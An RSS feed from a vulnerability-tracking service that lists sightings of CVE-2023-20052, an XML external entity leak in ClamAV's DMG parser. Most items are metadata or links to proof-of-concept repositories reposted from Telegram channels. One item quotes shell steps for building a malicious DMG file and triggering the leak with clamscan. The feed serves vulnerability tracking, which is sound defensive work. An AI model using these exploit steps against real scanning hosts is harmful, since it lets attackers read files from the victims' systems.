<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://vulnerability.circl.lu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 17 Jul 2026 10:06:08 +0000</lastBuildDate>
    <item>
      <title>297c2c97-0e71-4678-9ca1-49f1e53a305b</title>
      <link>https://vulnerability.circl.lu/sighting/297c2c97-0e71-4678-9ca1-49f1e53a305b/export</link>
      <description>{"uuid": "297c2c97-0e71-4678-9ca1-49f1e53a305b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "Telegram/M2s3PphtTCD9brru-X6QMyPesFMqQlhfbVnnLWpusEfiV5g", "content": "", "creation_timestamp": "2026-05-16T21:00:04.000000Z"}</description>
      <content:encoded>{"uuid": "297c2c97-0e71-4678-9ca1-49f1e53a305b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "Telegram/M2s3PphtTCD9brru-X6QMyPesFMqQlhfbVnnLWpusEfiV5g", "content": "", "creation_timestamp": "2026-05-16T21:00:04.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/297c2c97-0e71-4678-9ca1-49f1e53a305b/export</guid>
      <pubDate>Sat, 16 May 2026 21:00:04 +0000</pubDate>
    </item>
    <item>
      <title>806193ca-9ef3-4fc1-ad19-21b960da3d32</title>
      <link>https://vulnerability.circl.lu/sighting/806193ca-9ef3-4fc1-ad19-21b960da3d32/export</link>
      <description>{"uuid": "806193ca-9ef3-4fc1-ad19-21b960da3d32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/10664", "content": "CVE-2023-20052\n\nCVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV\n\nhttps://github.com/nokn0wthing/CVE-2023-25002\n\nPrivate: @RAVE_CGF", "creation_timestamp": "2024-04-02T00:59:21.000000Z"}</description>
      <content:encoded>{"uuid": "806193ca-9ef3-4fc1-ad19-21b960da3d32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/LockBitRaasRansomware/10664", "content": "CVE-2023-20052\n\nCVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV\n\nhttps://github.com/nokn0wthing/CVE-2023-25002\n\nPrivate: @RAVE_CGF", "creation_timestamp": "2024-04-02T00:59:21.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/806193ca-9ef3-4fc1-ad19-21b960da3d32/export</guid>
      <pubDate>Tue, 02 Apr 2024 00:59:21 +0000</pubDate>
    </item>
    <item>
      <title>b1a64e2d-fe93-4eed-89af-a1837bf1447c</title>
      <link>https://vulnerability.circl.lu/sighting/b1a64e2d-fe93-4eed-89af-a1837bf1447c/export</link>
      <description>{"uuid": "b1a64e2d-fe93-4eed-89af-a1837bf1447c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "Telegram/nPhrPfiXPUHAf58D5YpbTj99KkY4hNzkYP0rbZrOEVdw3Nc", "content": "", "creation_timestamp": "2024-04-02T00:59:20.000000Z"}</description>
      <content:encoded>{"uuid": "b1a64e2d-fe93-4eed-89af-a1837bf1447c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "Telegram/nPhrPfiXPUHAf58D5YpbTj99KkY4hNzkYP0rbZrOEVdw3Nc", "content": "", "creation_timestamp": "2024-04-02T00:59:20.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/b1a64e2d-fe93-4eed-89af-a1837bf1447c/export</guid>
      <pubDate>Tue, 02 Apr 2024 00:59:20 +0000</pubDate>
    </item>
    <item>
      <title>1ed5615b-2353-4280-b68c-a94f11256b10</title>
      <link>https://vulnerability.circl.lu/sighting/1ed5615b-2353-4280-b68c-a94f11256b10/export</link>
      <description>{"uuid": "1ed5615b-2353-4280-b68c-a94f11256b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "seen", "source": "https://t.me/arpsyndicate/1830", "content": "#ExploitObserverAlert\n\nCVE-2023-20052\n\nDESCRIPTION: Exploit Observer has 8 entries related to CVE-2023-20052. On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed:   A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device.   This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.\n\nFIRST-EPSS: 0.000620000\nNVD-IS: 1.4\nNVD-ES: 3.9", "creation_timestamp": "2023-12-16T14:45:12.000000Z"}</description>
      <content:encoded>{"uuid": "1ed5615b-2353-4280-b68c-a94f11256b10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "seen", "source": "https://t.me/arpsyndicate/1830", "content": "#ExploitObserverAlert\n\nCVE-2023-20052\n\nDESCRIPTION: Exploit Observer has 8 entries related to CVE-2023-20052. On Feb 15, 2023, the following vulnerability in the ClamAV scanning library was disclosed:   A vulnerability in the DMG file parser of ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier could allow an unauthenticated, remote attacker to access sensitive information on an affected device.   This vulnerability is due to enabling XML entity substitution that may result in XML external entity injection. An attacker could exploit this vulnerability by submitting a crafted DMG file to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to leak bytes from any file that may be read by the ClamAV scanning process.\n\nFIRST-EPSS: 0.000620000\nNVD-IS: 1.4\nNVD-ES: 3.9", "creation_timestamp": "2023-12-16T14:45:12.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/1ed5615b-2353-4280-b68c-a94f11256b10/export</guid>
      <pubDate>Sat, 16 Dec 2023 14:45:12 +0000</pubDate>
    </item>
    <item>
      <title>7ffe1d0d-c906-4c57-bf21-189fac965495</title>
      <link>https://vulnerability.circl.lu/sighting/7ffe1d0d-c906-4c57-bf21-189fac965495/export</link>
      <description>{"uuid": "7ffe1d0d-c906-4c57-bf21-189fac965495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5111", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-20052 information leak vulnerability in the DMG file parser of ClamAV\nURL\uff1ahttps://github.com/cY83rR0H1t/CVE-2023-20052\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-09-10T09:34:17.000000Z"}</description>
      <content:encoded>{"uuid": "7ffe1d0d-c906-4c57-bf21-189fac965495", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/5111", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-20052 information leak vulnerability in the DMG file parser of ClamAV\nURL\uff1ahttps://github.com/cY83rR0H1t/CVE-2023-20052\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-09-10T09:34:17.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/7ffe1d0d-c906-4c57-bf21-189fac965495/export</guid>
      <pubDate>Sun, 10 Sep 2023 09:34:17 +0000</pubDate>
    </item>
    <item>
      <title>f983a3e9-00ea-4835-9f4a-e6af8dbda443</title>
      <link>https://vulnerability.circl.lu/sighting/f983a3e9-00ea-4835-9f4a-e6af8dbda443/export</link>
      <description>{"uuid": "f983a3e9-00ea-4835-9f4a-e6af8dbda443", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "Telegram/daeCUX95O6ZDqcl0fr7xMzropW9nHK8k-upy-41VtmVTfc0", "content": "", "creation_timestamp": "2023-07-12T18:59:04.000000Z"}</description>
      <content:encoded>{"uuid": "f983a3e9-00ea-4835-9f4a-e6af8dbda443", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "Telegram/daeCUX95O6ZDqcl0fr7xMzropW9nHK8k-upy-41VtmVTfc0", "content": "", "creation_timestamp": "2023-07-12T18:59:04.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/f983a3e9-00ea-4835-9f4a-e6af8dbda443/export</guid>
      <pubDate>Wed, 12 Jul 2023 18:59:04 +0000</pubDate>
    </item>
    <item>
      <title>ca115462-5876-4d5b-87dd-a1cdc38dcebe</title>
      <link>https://vulnerability.circl.lu/sighting/ca115462-5876-4d5b-87dd-a1cdc38dcebe/export</link>
      <description>{"uuid": "ca115462-5876-4d5b-87dd-a1cdc38dcebe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "Telegram/IDULBW79zJZhskpsGVj91zDFqnvXO8OgHbEFqawpFcCxQpU", "content": "", "creation_timestamp": "2023-07-11T06:51:04.000000Z"}</description>
      <content:encoded>{"uuid": "ca115462-5876-4d5b-87dd-a1cdc38dcebe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "Telegram/IDULBW79zJZhskpsGVj91zDFqnvXO8OgHbEFqawpFcCxQpU", "content": "", "creation_timestamp": "2023-07-11T06:51:04.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/ca115462-5876-4d5b-87dd-a1cdc38dcebe/export</guid>
      <pubDate>Tue, 11 Jul 2023 06:51:04 +0000</pubDate>
    </item>
    <item>
      <title>fac75c52-4279-4417-b092-7db2d533f750</title>
      <link>https://vulnerability.circl.lu/sighting/fac75c52-4279-4417-b092-7db2d533f750/export</link>
      <description>{"uuid": "fac75c52-4279-4417-b092-7db2d533f750", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/3447", "content": "\ud83d\udca5CVE-2023-20052 exploit\n\nTo create malicious DMG file:\n\n$ git clone https://github.com/XXXXXXXX/CVE-2023-XXXX.git\n$ cd CVE-2023-20052\n$ sudo docker build -t cve-2023-20052 .\n$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash\n$ genisoimage -D -V \"exploit\" -no-pad -r -apple -file-mode 0777 -o test.img . &amp;amp;&amp;amp; dmg dmg test.img test.dmg\n$ bbe -e 's|| ]&amp;gt;|' -e 's/blkx/&amp;amp;xxe\\;/' test.dmg -o exploit.dmg\nTo trigger exploit:\n\n$ clamscan --debug exploit.dmg", "creation_timestamp": "2023-05-10T15:21:50.000000Z"}</description>
      <content:encoded>{"uuid": "fac75c52-4279-4417-b092-7db2d533f750", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/3447", "content": "\ud83d\udca5CVE-2023-20052 exploit\n\nTo create malicious DMG file:\n\n$ git clone https://github.com/XXXXXXXX/CVE-2023-XXXX.git\n$ cd CVE-2023-20052\n$ sudo docker build -t cve-2023-20052 .\n$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash\n$ genisoimage -D -V \"exploit\" -no-pad -r -apple -file-mode 0777 -o test.img . &amp;amp;&amp;amp; dmg dmg test.img test.dmg\n$ bbe -e 's|| ]&amp;gt;|' -e 's/blkx/&amp;amp;xxe\\;/' test.dmg -o exploit.dmg\nTo trigger exploit:\n\n$ clamscan --debug exploit.dmg", "creation_timestamp": "2023-05-10T15:21:50.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/fac75c52-4279-4417-b092-7db2d533f750/export</guid>
      <pubDate>Wed, 10 May 2023 15:21:50 +0000</pubDate>
    </item>
    <item>
      <title>beb8ba1c-3ef1-46ae-9a02-e488df8e9c61</title>
      <link>https://vulnerability.circl.lu/sighting/beb8ba1c-3ef1-46ae-9a02-e488df8e9c61/export</link>
      <description>{"uuid": "beb8ba1c-3ef1-46ae-9a02-e488df8e9c61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8270", "content": "#exploit\n1.CVE-2023-20052:\nInformation leak vulnerability in the DMG file parser of ClamAV\nhttps://github.com/nokn0wthing/CVE-2023-25002\n\n2. Exploits for CVE-2023-27327, CVE-2023-27328\n(Parallels Desktop VM)\nhttps://github.com/kn32/parallels-plist-escape\n\n3. CVE-2023-28231:\nDHCP Server RCE (2008 R2 SP1 - Server 2019)\nhttps://github.com/glavstroy/CVE-2023-28231", "creation_timestamp": "2023-05-10T11:03:01.000000Z"}</description>
      <content:encoded>{"uuid": "beb8ba1c-3ef1-46ae-9a02-e488df8e9c61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8270", "content": "#exploit\n1.CVE-2023-20052:\nInformation leak vulnerability in the DMG file parser of ClamAV\nhttps://github.com/nokn0wthing/CVE-2023-25002\n\n2. Exploits for CVE-2023-27327, CVE-2023-27328\n(Parallels Desktop VM)\nhttps://github.com/kn32/parallels-plist-escape\n\n3. CVE-2023-28231:\nDHCP Server RCE (2008 R2 SP1 - Server 2019)\nhttps://github.com/glavstroy/CVE-2023-28231", "creation_timestamp": "2023-05-10T11:03:01.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/beb8ba1c-3ef1-46ae-9a02-e488df8e9c61/export</guid>
      <pubDate>Wed, 10 May 2023 11:03:01 +0000</pubDate>
    </item>
    <item>
      <title>34cf5402-c354-4eca-b4ce-99b9d1f0e8ce</title>
      <link>https://vulnerability.circl.lu/sighting/34cf5402-c354-4eca-b4ce-99b9d1f0e8ce/export</link>
      <description>{"uuid": "34cf5402-c354-4eca-b4ce-99b9d1f0e8ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4320", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV\nURL\uff1ahttps://github.com/nokn0wthing/CVE-2023-25002\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-05-08T18:46:43.000000Z"}</description>
      <content:encoded>{"uuid": "34cf5402-c354-4eca-b4ce-99b9d1f0e8ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2023-20052", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4320", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aCVE-2023-20052, information leak vulnerability in the DMG file parser of ClamAV\nURL\uff1ahttps://github.com/nokn0wthing/CVE-2023-25002\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-05-08T18:46:43.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://vulnerability.circl.lu/sighting/34cf5402-c354-4eca-b4ce-99b9d1f0e8ce/export</guid>
      <pubDate>Mon, 08 May 2023 18:46:43 +0000</pubDate>
    </item>
  </channel>
</rss>
